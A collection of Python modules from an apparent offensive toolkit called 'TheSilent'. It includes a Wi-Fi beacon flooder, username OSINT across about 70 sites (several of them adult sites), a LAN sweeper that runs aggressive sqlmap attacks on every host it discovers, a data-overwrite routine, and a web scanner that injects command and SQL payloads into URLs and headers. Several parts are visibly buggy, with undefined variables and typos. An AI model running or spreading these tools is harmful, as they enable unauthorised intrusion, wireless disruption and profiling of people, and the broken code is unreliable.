import binascii
import random
import os
import socket
import sys
from sys import platform
from TheSilent.clear import clear

CYAN = "\033[1;36m"
RED = "\033[1;31m"

def ap(name, interface):
    clear()

    hex_characters = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "a", "b", "c", "d", "e", "f"]
    mac = "a4b239"
    for _ in range(6):
        mac += hex_characters[random.randint(0,15)]
        
    name = str(binascii.hexlify(name.encode())).replace("b'", "")
    name = name.replace("'", "")
    name_length = str(int(name, 16))
    if len(name_length) % 2 == 0:
        name_length = name_length.replace("0x", "")

    else:
       name_length = name_length.replace("x", "")

    try:
        if platform == "linux":
            os.system(f"sudo ip link set {interface} down")
            os.system(f"sudo iw {interface} set monitor control")
            os.system(f"sudo ip link set {interface} up")

            my_socket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))
            my_socket.bind((interface, 0))
            my_code = binascii.unhexlify("000018002e4000a02008000000026c09a000bd000000bd0080000000ffffffffffff" + mac.lower() + mac.lower() + "00019f11770a4f0100006400010400" + name_length + name + "010882848b962430486c0301010504000100002a01002f010032040c121860dd090010180200f02c0000dd180050f2020101800003a4000027a4000042435e0062322f00")

        else:
            print(RED + "Unsupported platform! Linux is required for this tool!")
            sys.exit()
            
    except PermissionError:
        print(RED + "ERROR! Permission Denied!")
        sys.exit()
        

    while True:
        print(CYAN + "*", end="", flush=True)
        try:
            my_socket.sendall(my_code)

        except OSError:
            os.system(f"sudo ip link set {interface} down")
            os.system(f"sudo iw {interface} set monitor control")
            os.system(f"sudo ip link set {interface} up")



import ssl
import time
import urllib.request
from urllib.parse import urlparse
from TheSilent.clear import clear
from TheSilent.return_user_agent import return_user_agent

CYAN = "\033[1;36m"
RED = "\033[1;31m"

tor_proxy = {
    "http": "socks5h://localhost:9050",
    "https": "socks5h://localhost:9050"}

verify = ssl.create_default_context()
verify.check_hostname = False
verify.verify_mode = ssl.CERT_NONE

def osint(username, delay=1):
    clear()

    my_list = []

    special_list = ["_", "-", ".", ""]
    username_list = []

    website_dict = {
        "AllMyLinks": "https://allmylinks.com/{}",
        "Apple Developer": "https://developer.apple.com/forums/profile/{}",
        "Apple Discussions": "https://discussions.apple.com/profile/{}",
        "Archive.org": "https://archive.org/details/@{}",
        "Ask Fedora": "https://ask.fedoraproject.org/u/{}",
        "Bandcamp": "https://www.bandcamp.com/{}",
        "BitCoinForum": "https://bitcoinforum.com/profile/{}",
        "BongaCams": "https://pt.bongacams.com/profile/{}",
        "BraveCommunity": "https://community.brave.com/u/{}/",
        "BuyMeACoffee": "https://buymeacoff.ee/{}",
        "BuzzFeed": "https://buzzfeed.com/{}",
        "ChaturBate": "https://chaturbate.com/{}",
        "CloudflareCommunity": "https://community.cloudflare.com/u/{}",
        "CNET": "https://www.cnet.com/profiles/{}/",
        "Codecademy": "https://www.codecademy.com/profiles/{}",
        "Cryptomator Forum": "https://community.cryptomator.org/u/{}",
        "DailyMotion": "https://www.dailymotion.com/{}",
        "Fandom": "https://www.fandom.com/u/{}",
        "FortniteTracker": "https://fortnitetracker.com/profile/all/{}",
        "Freesound": "https://freesound.org/people/{}/",
        "Gamespot": "https://www.gamespot.com/profile/{}/",
        "Genius (Artists)": "https://genius.com/artists/{}",
        "Genius (Users)": "https://genius.com/{}",
        "geocaching": "https://www.geocaching.com/p/default.aspx?u={}",
        "Giphy": "https://giphy.com/{}",
        "GitHub": "https://www.github.com/{}",
        "GoodReads": "https://www.goodreads.com/{}",
        "HackerOne": "https://hackerone.com/{}",
        "Instagram": "https://www.picuki.com/profile/{}",
        "Instructables": "https://www.instructables.com/member/{}",
        "Linktree": "https://linktr.ee/{}",
        "Minecraft": "https://api.mojang.com/users/profiles/minecraft/{}",
        "Newgrounds": "https://{}.newgrounds.com",
        "OnlyFans": "https://onlyfans.com/api2/v2/users/{}",
        "OpenStreetMap": "https://www.openstreetmap.org/user/{}",
        "Oracle Community": "https://community.oracle.com/people/{}",
        "Pastebin": "https://pastebin.com/u/{}",
        "Patreon": "https://www.patreon.com/{}",
        "PCGamer": "https://forums.pcgamer.com/members/?username={}",
        "Periscope": "https://www.periscope.tv/{}/",
        "Pinterest": "https://www.pinterest.com/{}/",
        "PlayStore": "https://play.google.com/store/apps/developer?id={}",
        "Pokemon Showdown": "https://pokemonshowdown.com/users/{}",
        "Pornhub": "https://pornhub.com/users/{}",
        "Poshmark": "https://poshmark.com/closet/{}",
        "PyPi": "https://pypi.org/user/{}",
        "Quizlet": "https://quizlet.com/{}",
        "Roblox": "https://www.roblox.com/user.aspx?username={}",
        "RoyalCams": "https://royalcams.com/profile/{}",
        "Scratch": "https://scratch.mit.edu/users/{}",
        "Signal": "https://community.signalusers.org/u/{}",
        "Slack": "https://{}.slack.com",
        "Slant": "https://www.slant.co/users/{}",
        "SoundCloud": "https://soundcloud.com/{}",
        "SourceForge": "https://sourceforge.net/u/{}",
        "Speedrun.com": "https://speedrun.com/user/{}",
        "TikTok": "https://tiktok.com/@{}",
        "Trello": "https://trello.com/1/Members/{}",
        "TryHackMe": "https://tryhackme.com/p/{}",
        "Twitch": "https://m.twitch.tv/{}",
        "Vimeo": "https://vimeo.com/{}",
        "VirusTotal": "https://www.virustotal.com/ui/users/{}/avatar",
        "VSCO": "https://vsco.co/{}",
        "Wattpad": "https://www.wattpad.com/api/v3/users/{}/",
        "Xbox Gamertag": "https://xboxgamertag.com/search/{}",
        "xHamster": "https://xhamster.com/users/{}",
        "Xvideos": "https://xvideos.com/profiles/{}",
        "YouPorn": "https://youporn.com/uservids/{}"}
    type_dict = {
        "AllMyLinks": "Not Found[False]",
        "Apple Developer": "status_code",
        "Apple Discussions": "The page you tried was not found. You may have used an outdated link or may have typed the address (URL) incorrectly.[False]",
        "Archive.org": "cannot find account[False]",
        "Ask Fedora": "status_code",
        "Bandcamp": "status_code",
        "BitCoinForum": "The user whose profile you are trying to view does not exist.[False]",
        "BongaCams": "status_code",
        "BraveCommunity": "status_code",
        "BuyMeACoffee": "status_code",
        "BuzzFeed": "status_code",
        "ChaturBate": "status_code",
        "CloudflareCommunity": "status_code",
        "CNET": "status_code",
        "Codecademy": "This profile could not be found[False]",
        "Codecademy": "This profile could not be found",
        "Cryptomator Forum": "status_code",
        "DailyMotion": "status_code",
        "Fandom": "status_code",
        "FortniteTracker": "status_code",
        "Freesound": "status_code",
        "Gamespot": "status_code",
        "Genius (Artists)": "status_code",
        "Genius (Users)": "status_code",
        "geocaching": "status_code",
        "Giphy": "status_code",
        "GitHub": "status_code",
        "GoodReads": "status_code",
        "HackerOne": "{}[True]",
        "Instagram": "Nothing found![False]",
        "Instructables": "status_code",
        "Linktree": "status_code",
        "Minecraft": "status_code",
        "Newgrounds": "status_code",
        "OnlyFans": "status_code",
        "OpenStreetMap": "status_code",
        "Oracle Community": "status_code",
        "Pastebin": "Not Found (#404)[False]",
        "Patreon": "status_code",
        "PCGamer": "The specified member cannot be found. Please enter a member's entire name.[False]",
        "Periscope": "status_code",
        "Pinterest": "@{}[True]",
        "PlayStore": "status_code",
        "Pokemon Showdown": "Pokemon Showdown",
        "Pornhub": "status_code",
        "Poshmark": "status_code",
        "PyPi": "status_code",
        "Quizlet": "Page Unavailable[False]",
        "Roblox": "Page cannot be found or no longer exists[False]",
        "RoyalCams": "status_code",
        "Scratch": "status_code",
        "Signal": "Oops! That page doesn\u2019t exist or is private.[False]",
        "Slack": "status_code",
        "Slant": "status_code",
        "SoundCloud": "status_code",
        "SourceForge": "status_code",
        "Speedrun.com": "not found.[False]",
        "TikTok": "status_code",
        "Trello": "model not found[False]",
        "TryHackMe": "status_code",
        "Twitch": "status_code",
        "Vimeo": "status_code",
        "VirusTotal": "status_code",
        "VSCO": "status_code",
        "Wattpad": "status_code",
        "Xbox Gamertag": "status_code",
        "xHamster": "status_code",
        "Xvideos": "status_code",
        "YouPorn": "status_code"}

    for i in special_list:
        username_list.append(username.replace(" ", i))
        try:
            new_name = username.split(" ")
            username_list.append(new_name[0][0] + new_name[-1])
            username_list.append(new_name[0] + new_name[-1] + new_name[-1][-1])

        except IndexError:
            continue

    if " " not in username:
        for i in range(len(list(website_dict.values()))):
            time.sleep(delay)
            try:
                print(CYAN + "Checking: " + list(website_dict)[i] + " (" + username + ")")

                if list(type_dict.values())[i] == "status_code":
                    url = list(website_dict.values())[i]
                    url = url.replace("{}", username)

                    simple_request = urllib.request.Request(url, method="GET")
                    simple_request.add_header("User-Agent",return_user_agent())
                    my_request = urllib.request.urlopen(simple_request, context=verify).status

                    if my_request == 200:
                        print(CYAN + "True: " + list(website_dict)[i] + " (" + username + ")")
                        my_list.append(list(website_dict)[i] + " (" + username + ")")

                if list(type_dict.values())[i] != "status_code":
                    url = list(website_dict.values())[i]
                    url = url.replace("{}", username)

                    simple_request = urllib.request.Request(url, method="GET")
                    simple_request.add_header("User-Agent",return_user_agent())
                    my_request = str(urllib.request.urlopen(url, context=verify).read())

                    parse = list(type_dict.values())[i].replace("{}", username)
                    parse = parse.replace("[False]", "")
                    parse = parse.replace("[True]", "")

                    if parse not in my_request and "[False]" in list(type_dict.values())[i]:
                        print(CYAN + "True: " + list(website_dict)[i] + " (" + username + ")")
                        my_list.append(list(website_dict)[i] + " (" + username + ")")

                    if parse in my_request and "[True]" in list(type_dict.values())[i]:
                        print(CYAN + "True: " + list(website_dict)[i] + " (" + username + ")")
                        my_list.append(list(website_dict)[i] + " (" + username + ")")

            except urllib.error.HTTPError:
                pass
            
            except:
                print(RED + "ERROR!")

    if " " in username:
        for i in range(len(list(website_dict.values()))):
            for new_name in username_list:
                time.sleep(delay)
                try:
                    print(CYAN + "Checking: " + list(website_dict)[i] + " (" + new_name + ")")
                    if list(type_dict.values())[i] == "status_code":
                        url = list(website_dict.values())[i]
                        url = url.replace("{}", new_name)

                        simple_request = urllib.request.Request(url, method="GET")
                        simple_request.add_header("User-Agent",return_user_agent())
                        my_request = urllib.request.urlopen(simple_request, context=verify).status

                        if my_request == 200:
                            print(CYAN + "True: " + list(website_dict)[i] + " (" + username + ")")
                            my_list.append(list(website_dict)[i] + " (" + username + ")")

                    if list(type_dict.values())[i] != "status_code":
                        url = list(website_dict.values())[i]
                        url = url.replace("{}", new_name)

                        simple_request = urllib.request.Request(url, method="GET")
                        simple_request.add_header("User-Agent",return_user_agent())
                        my_request = str(urllib.request.urlopen(simple_request, context=verify).read())

                        parse = list(type_dict.values())[i].replace("{}", username)
                        parse = parse.replace("[False]", "")
                        parse = parse.replace("[True]", "")

                        if parse not in my_request and "[False]" in list(type_dict.values())[i]:
                            print(CYAN + "True: " + list(website_dict)[i] + " (" + new_name + ")")
                            my_list.append(list(website_dict)[i] + " (" + new_name + ")")

                        if parse in my_request and "[True]" in list(type_dict.values())[i]:
                            print(CYAN + "True: " + list(website_dict)[i] + " (" + new_name + ")")
                            my_list.append(list(website_dict)[i] + " (" + new_name + ")")

                except urllib.error.HTTPError:
                    pass

                except PermissionError:
                    print(RED + "ERROR!")

    print(CYAN + "")
    clear()

    return my_list



from TheSilent.ap import *
from TheSilent.arp_void import *
from TheSilent.beacon_thief import *
from TheSilent.brute_force_hash import *
from TheSilent.clear import *
from TheSilent.dictionary_hash import *
from TheSilent.hex_viewer import *
from TheSilent.mage import *
from TheSilent.osint import *
from TheSilent.packet_sniffer import *
from TheSilent.secure_overwrite import *
from TheSilent.source_code_viewer import *
from TheSilent.web_scanner import *



import os
import random
import re
import socket
import time
from subprocess import run
from TheSilent.clear import *
from TheSilent.web_scanner import *

CYAN = "\033[1;36m"

def elf():
    start = time.time()
    clear()
    host_list = []
    ip_list = []

    print(CYAN + "Running nmap!")    
    ip_addr_command = str(run(["ip","addr"], capture_output=True).stdout)
    ip_addr = re.findall("\d{1,4}\.\d{1,4}\.\d{1,4}\.\d{1,4}\/\d{2}", ip_addr_command)[0]
    nmap = str(run(["nmap","-sn", ip_addr], capture_output=True).stdout)
    ip_list = re.findall("\d{1,4}\.\d{1,4}\.\d{1,4}\.\d{1,4}", nmap)

    ip_list = random.sample(ip_list[:], len(ip_list[:]))
    print(CYAN + "Getting banners from hosts!")
    for host in ip_list:
        time.sleep(1)
        print(CYAN + f"Running nmap against: {host}")
        nmap = str(run(["nmap","-Pn", host], capture_output=True).stdout)
        port_list = re.findall("(\d+)/tcp", nmap.lower())
        port_list = random.sample(port_list[:], len(port_list[:]))
        for port in port_list:
            time.sleep(1)
            my_socket = socket.socket()
            my_socket.settimeout(15)
            try:
                my_socket.connect((host, int(port)))
                print(CYAN + f"getting banner: {host}:{port}")
                banner = my_socket.recv(4096)
                print(CYAN + banner)
                with open("report.txt", "a") as file:
                    file.write(str(banner) + "\n")

                my_socket.close()

            except:
                my_socket.close()
                continue

    pause = input()

    ip_list = random.sample(ip_list[:], len(ip_list[:]))

    for ip in ip_list:
        time.sleep(1)
        clear()
        print(CYAN + f"Running The Silent's web scanner against: http://{ip}")
        my_web_scanner = web_scanner(f"http://{ip}")

        with open("report.txt", "a") as file:
            if my_web_scanner == "This server is secure!":
                file.write(f"{ip}: This server is secure!\n")
                print(CYAN + f"{ip}: This server is secure!")

            if my_web_scanner == "This website doesn't exist or is down!":
                file.write(f"{ip}: This website doesn't exist or is down!\n")
                print(CYAN + f"{ip}: This website doesn't exist or is down!")

            else:
                for vuln in my_web_scanner[0]:
                    file.write(f"{ip}: {vuln}\n")
                    print(RED + (f"{ip}: {vuln}"))

                for vuln in my_web_scanner[1]:
                    file.write(f"{ip}: {vuln}\n")
                    print(RED + (f"{ip}: {vuln}"))

        clear()
        print(CYAN + f"Running The Silent's web scanner against: https://{ip}")
        my_web_scanner = web_scanner(f"https://{ip}")

        with open("report.txt", "a") as file:
            if my_web_scanner[0] == "This server is secure!":
                file.write(f"{ip}: This server is secure!\n")
                print(CYAN + f"{ip}: This server is secure!")

            if my_web_scanner == "This website doesn't exist or is down!":
                file.write(f"{ip}: This website doesn't exist or is down!\n")
                print(CYAN + f"{ip}: This website doesn't exist or is down!")

            else:
                for vuln in my_web_scanner[0]:
                    file.write(f"{ip}: {vuln}\n")
                    print(RED + (f"{ip}: {vuln}"))

                for vuln in my_web_scanner[1]:
                    file.write(f"{ip}: {vuln}\n")
                    print(RED + (f"{ip}: {vuln}"))

    ip_list = random.sample(ip_list[:], len(ip_list[:]))
    for ip in ip_list:
        time.sleep(1)
        clear()
        print(CYAN + f"Running sqlmap against: http://{ip}")
        os.system(f"sqlmap --url=http://{ip} --random-agent --level=5 --risk=3 --all --delay=1 --flush-session --batch")
        
    end = time.time()
    total_time = str(int(end - start))

    clear()
    print("Elf has finished!")
    print(f"Time: {total_time} seconds!")

elf()



import os
from TheSilent.clear import clear

CYAN = "\033[1;36m"
RED = "\033[1;31m"

# securely destroys data
def secure_overwrite(device):
    clear()

    if os.path.isfile(device):
        try:
            size = os.path.getsize(device)
            for i in range(1, 8):
                clear()
                print(CYAN + "pass: " + str(i))
                with open(device, "wb") as file:
                    for byte in range(size):
                        file.seek(byte)
                        file.write(b"0")

        except PermissionError:
            print(RED + "ERROR! Permission denied!")
            exit()

        except OSError:
            pass

    if os.path.isdir(device):
        for i in range(1, 8):
            clear()
            print(CYAN + "pass: " + str(i))
            for path, directories, files in os.walk(device,  topdown=True):
                for directory in directories:
                    file_path = os.listdir(path + "/" + directory)
                    for file in file_path:
                        filed = path + "/" + directory + "/" + file
                        if os.path.isfile(filed):
                            try:
                                size = os.path.getsize(filed)
                                print(CYAN + filed)
                                with open(filed, "wb") as f:
                                    for byte in range(size):
                                        f.seek(byte)
                                        f.write(b"0")

                            except PermissionError:
                                print(RED + "ERROR! Permission denied!")
                                continue

    print(CYAN + device)
    print(CYAN + "done")



import binascii
import os
import socket
import sys
from sys import platform
from TheSilent.clear import clear

CYAN = "\033[1;36m"
RED = "\033[1;31m"

def beacon_thief(interface):
    clear()
    try:
        if platform == "linux":
            os.system(f"sudo ip link set {interface} down")
            os.system(f"sudo iw {interface} set monitor control")
            os.system(f"sudo ip link set {interface} up")

        else:
            print(RED + "Unsupported platform! Linux is required for this tool!")
            sys.exit()
            

        my_socket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))
        my_socket.bind((interface, 0))

        ssid_list = []
        beacon_list = []

        if os.path.exists("ssid_list.txt"):
            with open("ssid_list.txt", "r") as file:
                for f in file:
                    f = f.replace("\n", "")
                    ssid_list.append(f)
                    print(f)
        
        while True:
            try:
                packet = my_socket.recv(65536)
                data = binascii.hexlify(packet).decode()

                if data[0:8] == "00001800" and  data[48:50] == "80":
                    ssid_length = int(data[121:124], 16)
                    ssid = bytearray.fromhex(data[124:124+ssid_length*2]).decode()
                    add = True
                    for name in ssid_list:
                        if name == ssid:
                            add = False
                            break

                    if add:
                        print("found: " + ssid)
                        ssid_list.append(ssid)
                        with open("ssid_list.txt", "a") as file:
                            file.write(ssid + "\n")
                        with open("beacons.txt", "a") as file:
                            file.write(data + "\n")

            except OSError:
                os.system(f"sudo ip link set {interface} down")
                os.system(f"sudo iw {interface} set monitor control")
                os.system(f"sudo ip link set {interface} up")
                continue

    except PermissionError:
        print(RED + "ERROR! Permission Denied!")
        sys.exit()



import os
import random
import re
import socket
import ssl
import time
import urllib.parse
import urllib.request
from ftplib import FTP, FTP_TLS
from subprocess import run
from TheSilent.return_user_agent import return_user_agent
from TheSilent.clear import clear

verify = ssl.create_default_context()
verify.check_hostname = False
verify.verify_mode = ssl.CERT_NONE

RED = "\033[1;31m"
CYAN = "\033[1;36m"
GREEN = "\033[0;32m"

sql_errors = ["SQL syntax.*?MySQL",
        "Warning.*?\\Wmysqli?_",
        "MySQLSyntaxErrorException",
        "valid MySQL result",
        "check the manual that (corresponds to|fits) your MySQL server version",
        "check the manual that (corresponds to|fits) your MariaDB server version",
        "check the manual that (corresponds to|fits) your Drizzle server version",
        "Unknown column '[^ ]+' in 'field list'",
        "MySqlClient\\.",
        "com\\.mysql\\.jdbc",
        "Zend_Db_(Adapter|Statement)_Mysqli_Exception",
        "Pdo\\[./_\\]Mysql",
        "MySqlException",
        "SQLSTATE\\[\\d+\\]: Syntax error or access violation",
        "MemSQL does not support this type of query",
        "is not supported by MemSQL",
        "unsupported nested scalar subselect",
        "PostgreSQL.*?ERROR",
        "Warning.*?\\Wpg_",
        "valid PostgreSQL result",
        "Npgsql\\.",
        "PG::SyntaxError:",
        "org\\.postgresql\\.util\\.PSQLException",
        "ERROR:\\s\\ssyntax error at or near",
        "ERROR: parser: parse error at or near",
        "PostgreSQL query failed",
        "org\\.postgresql\\.jdbc",
        "Pdo\\[./_\\]Pgsql",
        "PSQLException",
        "OLE DB.*? SQL Server",
        "\bSQL Server[^&lt;&quot;]+Driver",
        "Warning.*?\\W(mssql|sqlsrv)_",
        "\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}",
        "System\\.Data\\.SqlClient\\.(SqlException|SqlConnection\\.OnError)",
        "(?s)Exception.*?\bRoadhouse\\.Cms\\.",
        "Microsoft SQL Native Client error '[0-9a-fA-F]{8}",
        "\\[SQL Server\\]",
        "ODBC SQL Server Driver",
        "ODBC Driver \\d+ for SQL Server",
        "SQLServer JDBC Driver",
        "com\\.jnetdirect\\.jsql",
        "macromedia\\.jdbc\\.sqlserver",
        "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception",
        "com\\.microsoft\\.sqlserver\\.jdbc",
        "Pdo\\[./_\\](Mssql|SqlSrv)",
        "SQL(Srv|Server)Exception",
        "Unclosed quotation mark after the character string",
        "Microsoft Access (\\d+ )?Driver",
        "JET Database Engine",
        "Access Database Engine",
        "ODBC Microsoft Access",
        "Syntax error \\(missing operator\\) in query expression",
        "\bORA-\\d{5}",
        "Oracle error",
        "Oracle.*?Driver",
        "Warning.*?\\W(oci|ora)_",
        "quoted string not properly terminated",
        "SQL command not properly ended",
        "macromedia\\.jdbc\\.oracle",
        "oracle\\.jdbc",
        "Zend_Db_(Adapter|Statement)_Oracle_Exception",
        "Pdo\\[./_\\](Oracle|OCI)",
        "OracleException",
        "CLI Driver.*?DB2",
        "DB2 SQL error",
        "\bdb2_\\w+\\(",
        "SQLCODE[=:\\d, -]+SQLSTATE",
        "com\\.ibm\\.db2\\.jcc",
        "Zend_Db_(Adapter|Statement)_Db2_Exception",
        "Pdo\\[./_\\]Ibm",
        "DB2Exception",
        "ibm_db_dbi\\.ProgrammingError",
        "Warning.*?\\Wifx_",
        "Exception.*?Informix",
        "Informix ODBC Driver",
        "ODBC Informix driver",
        "com\\.informix\\.jdbc",
        "weblogic\\.jdbc\\.informix",
        "Pdo\\[./_\\]Informix",
        "IfxException",
        "Dynamic SQL Error",
        "Warning.*?\\Wibase_",
        "org\\.firebirdsql\\.jdbc",
        "Pdo\\[./_\\]Firebird",
        "SQLite/JDBCDriver",
        "SQLite\\.Exception",
        "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException",
        "Warning.*?\\W(sqlite_|SQLite3::)",
        "\\[SQLITE_ERROR\\]",
        "SQLite error \\d+:",
        "sqlite3.OperationalError:",
        "SQLite3::SQLException",
        "org\\.sqlite\\.JDBC",
        "Pdo\\[./_\\]Sqlite",
        "SQLiteException",
        "SQL error.*?POS([0-9]+)",
        "Warning.*?\\Wmaxdb_",
        "DriverSapDB",
        "-3014.*?Invalid end of SQL statement",
        "com\\.sap\\.dbtech\\.jdbc",
        "\\[-3008\\].*?: Invalid keyword or missing delimiter",
        "Warning.*?\\Wsybase_",
        "Sybase message",
        "Sybase.*?Server message",
        "SybSQLException",
        "Sybase\\.Data\\.AseClient",
        "com\\.sybase\\.jdbc",
        "Warning.*?\\Wingres_",
        "Ingres SQLSTATE",
        "Ingres\\W.*?Driver",
        "com\\.ingres\\.gcf\\.jdbc",
        "Exception (condition )?\\d+\\. Transaction rollback",
        "com\\.frontbase\\.jdbc",
        "Syntax error 1. Missing",
        "(Semantic|Syntax) error [1-4]\\d{2}\\.",
        "Unexpected end of command in statement \\[",
        "Unexpected token.*?in statement \\[",
        "org\\.hsqldb\\.jdbc",
        "org\\.h2\\.jdbc",
        "\\[42000-192\\]",
        "![0-9]{5}![^\n]+(failed|unexpected|error|syntax|expected|violation|exception)",
        "\\[MonetDB\\]\\[ODBC Driver",
        "nl\\.cwi\\.monetdb\\.jdbc",
        "Syntax error: EncounteCYAN",
        "org\\.apache\\.derby",
        "ERROR 42X01",
        ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):",
        "/vertica/Parser/scan",
        "com\\.vertica\\.jdbc",
        "org\\.jkiss\\.dbeaver\\.ext\\.vertica",
        "com\\.vertica\\.dsi\\.dataengine",
        "com\\.mckoi\\.JDBCDriver",
        "com\\.mckoi\\.database\\.jdbc",
        "&lt;REGEX_LITERAL&gt;",
        "com\\.facebook\\.presto\\.jdbc",
        "io\\.prestosql\\.jdbc",
        "com\\.simba\\.presto\\.jdbc",
        "UNION query has different number of fields: \\d+, \\d+",
        "Altibase\\.jdbc\\.driver",
        "com\\.mimer\\.jdbc",
        "Syntax error,[^\n]+assumed to mean",
        "io\\.crate\\.client\\.jdbc",
        "encounteCYAN after end of query",
        "A comparison operator is requiCYAN here",
        "-10048: Syntax error",
        "rdmStmtPrepare\\(.+?\\) returned",
        "SQ074: Line \\d+:",
        "SR185: Undefined procedure",
        "SQ200: No table ",
        "Virtuoso S0002 Error",
        "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]"]

def web_scanner(host, delay=1):
    clear()
    payload_list = []
    response_admin = 0
    response_cgi_bin = 0
    response_directory_traversal = 0
    response_env = 0
    response_git = 0
    response_the_silent_directory = 0
    response_trace = 0
    response_track = 0
    response_the_silent_method = 0
    response_command_url = False
    response_command_headers = False
    response_command_cookie = False
    response_command_method = False
    response_python_url = False
    response_python_headers = False
    response_python_cookie = False
    response_python_method = False
    response_sql_url = False
    response_sql_headers = False
    response_sql_cookie = False
    response_sql_method = False
    response_xss_url = False
    response_xss_headers = False
    response_xss_cookie = False
    response_xss_method = False

    # test to see if website is up
    print(CYAN + "checking connection")
    try:
        my_request = urllib.request.Request(host, method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        response_admin = urllib.request.urlopen(my_request, context=verify)
        time.sleep(delay)

        my_request = urllib.request.Request(host, method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        false_positive_check = str(urllib.request.urlopen(my_request, context=verify).read())
        time.sleep(delay)

    except ValueError:
        print(RED + "")
        clear()
        return "Invalid url!"

    except urllib.error.URLError:
        print(RED + "")
        clear()
        return "This website doesn't exist or is down!"

    clear()
    print(CYAN + "running nmap")
    new_host = host.replace("http://", "")
    new_host = new_host.replace("https://", "")
    nmap = str(run(["nmap","-Pn", new_host], capture_output=True).stdout)
    port_list = re.findall("(\d+)/tcp", nmap.lower())
    port_list = random.sample(port_list[:], len(port_list[:]))
    for port in port_list:
        time.sleep(delay)
        my_socket = socket.socket()
        my_socket.settimeout(15)
        try:
            my_socket.connect((new_host, int(port)))
            print(CYAN + f"getting banner: {new_host}:{port}")
            banner = my_socket.recv(4096)
            print(CYAN + f"port {port}: {banner}")
            threats.append(f"port {port}: {banner}")

            my_socket.close()

        except:
            my_socket.close()
            continue

    clear()
    print(CYAN + "running sqlmap")
    os.system(f"sqlmap --url={host} --random-agent --level=5 --risk=3 --all --delay={delay} --flush-session --batch")
    pause = input()
    clear()
    # test to see if website is up
    print(CYAN + "checking connection")
    try:
        my_request = urllib.request.Request(host, method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        response_admin = urllib.request.urlopen(my_request, context=verify)
        time.sleep(delay)

        my_request = urllib.request.Request(host, method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        false_positive_check = str(urllib.request.urlopen(my_request, context=verify).read())
        time.sleep(delay)

    except ValueError:
        print(RED + "")
        clear()
        return "Invalid url!"

    except urllib.error.URLError:
        print(RED + "")
        clear()
        return "This website doesn't exist or is down!"

    clear()
    
    try:
        # get admin
        print(CYAN + "checking for admin")
        my_request = urllib.request.Request(host + "/admin", method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        response_admin = urllib.request.urlopen(my_request, context=verify).status
        time.sleep(delay)
    except:
        pass

    try:
        # get cgi-bin
        print(CYAN + "checking for cgi-bin")
        my_request = urllib.request.Request(host + "/cgi-bin", method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        response_cgi_bin = urllib.request.urlopen(my_request, context=verify).status
        time.sleep(delay)
    except:
        pass

    try:
        # test directory traversal
        print(CYAN + "checking for directory traversal using /.../")
        my_request = urllib.request.Request(host + "/.../", method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        response_directory_traversal = urllib.request.urlopen(my_request, context=verify).status
        time.sleep(delay)
    except:
        pass

    try:
        # get .env
        print(CYAN + "checking for .env")
        my_request = urllib.request.Request(host + "/.env", method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        response_env = urllib.request.urlopen(my_request, context=verify).status
        time.sleep(delay)
    except:
        pass

    try:
        # get .git
        print(CYAN + "checking for .git")
        my_request = urllib.request.Request(host + "/.git", method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        response_admin = urllib.request.urlopen(my_request, context=verify).status
        time.sleep(delay)
    except:
        pass

    try:
        # get TheSilent (false positive check)
        print(CYAN + "checking for TheSilent")
        my_request = urllib.request.Request(host + "/TheSilent", method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        response_the_silent_directory = urllib.request.urlopen(my_request, context=verify).status
        time.sleep(delay)
    except:
        pass

    try:
        # test trace method
        print(CYAN + "checking trace method")
        my_request = urllib.request.Request(host, method="TRACE")
        my_request.add_header("User-Agent",return_user_agent())
        response_trace = urllib.request.urlopen(my_request, context=verify).status
        time.sleep(delay)
    except:
        pass

    try:
        # test track method
        print(CYAN + "checking track method")
        my_request = urllib.request.Request(host, method="TRACK")
        my_request.add_header("User-Agent",return_user_agent())
        response_track = urllib.request.urlopen(my_request, context=verify).status
        time.sleep(delay)
    except:
        pass

    try:
        # test THESILENT method (false positive check)
        print(CYAN + "checking THESILENT method")
        my_request = urllib.request.Request(host, method="THESILENT")
        my_request.add_header("User-Agent",return_user_agent())
        response_trace = urllib.request.urlopen(my_request, context=verify).status
        time.sleep(delay)
    except:
        pass

    # test for command injection in url
    print(CYAN + "checking for command injection in url")
    mal_commands = ["/echo TheSilent", "/ping -c 60 127.0.0.1"]
    
    for mal in mal_commands:
        time.sleep(delay)
        start = time.time()
        try:
            my_request = urllib.request.Request(host + f"/{urllib.parse.quote(mal)}", method="GET")
            my_request.add_header("User-Agent",return_user_agent())
            simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
        except:
            continue
        
        end = time.time()
        if mal == "/echo TheSilent" and "TheSilent" in simple_response and "echo" not in simple_response and "TheSilent" not in false_postive_check:
            response_command_url = True
            payload_list.append(f"url: {mal}")

        if mal == "/ping -c 60 127.0.0.1" and end - start >= 60:
            response_command_url = True
            payload_list.append(f"url: {mal}")

    # test for command injection in headers
    print(CYAN + "checking for command injection in headers")
    mal_commands = ["/echo TheSilent", "/ping -c 60 127.0.0.1"]

    # get original headers
    try:
        my_request = urllib.request.Request(host, method="GET")
        my_request.add_header("User-Agent",return_user_agent())
        header_response = urllib.request.urlopen(my_request, context=verify).headers
    except:
        pass
    
    time.sleep(delay)
    for head in header_response:
        for mal in mal_commands:
            time.sleep(delay)
            start = time.time()
            try:
                my_request = urllib.request.Request(host, method="GET")
                my_request.add_header("User-Agent",return_user_agent())
                my_request.add_header(head,mal)
                simple_response = str(urllib.request.urlopen(my_request, context=verify).read())
            except:
                continue
            
            end = time.time()
            if mal == "/echo TheSilent" and "TheSilent" in simple_response and "echo" not in simple_response and "TheSilent" not in false_positive_check:
                response_command_headers = True
                payload_list.append(f"header: {head}:{mal}")

